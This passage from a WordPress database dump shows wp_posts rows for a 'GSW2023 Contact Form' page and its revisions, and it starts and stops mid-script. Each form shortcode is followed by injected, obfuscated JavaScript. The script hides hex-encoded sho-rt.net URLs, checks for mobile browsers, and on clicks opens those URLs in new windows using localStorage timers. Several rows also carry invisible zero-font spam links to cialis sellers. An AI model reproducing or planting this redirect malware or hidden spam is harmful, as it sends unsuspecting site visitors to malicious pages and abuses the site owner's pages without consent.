_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Please Fill Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 23:21:58','2023-08-20 23:21:58','',5345,'https://gsw2023.com/?p=5363',0,'revision','',0),
(5364,1,'2023-08-20 23:45:40','2023-08-20 23:45:40','[fluentform id=\"1\"]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialismo.com/\">犀利士</a>\n</span>x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialiman.com/\">犀利士</a>\n</span>v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialiman.com/\">犀利士</a>\n</span>]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Contact Form','','publish','closed','closed','','5364','','','2023-10-03 13:30:00','2023-10-03 13:30:00','',0,'https://gsw2023.com/?p=5364',0,'post','',0),
(5365,1,'2023-08-20 23:45:40','2023-08-20 23:45:40','[wpforms id=\"5345\" title=\"false\"]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','','','inherit','closed','closed','','5364-revision-v1','','','2023-08-20 23:45:40','2023-08-20 23:45:40','',5364,'https://gsw2023.com/?p=5365',0,'revision','',0),
(5366,1,'2023-08-20 23:46:21','2023-08-20 23:46:21','[wpforms id=\"5345\" title=\"false\"]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 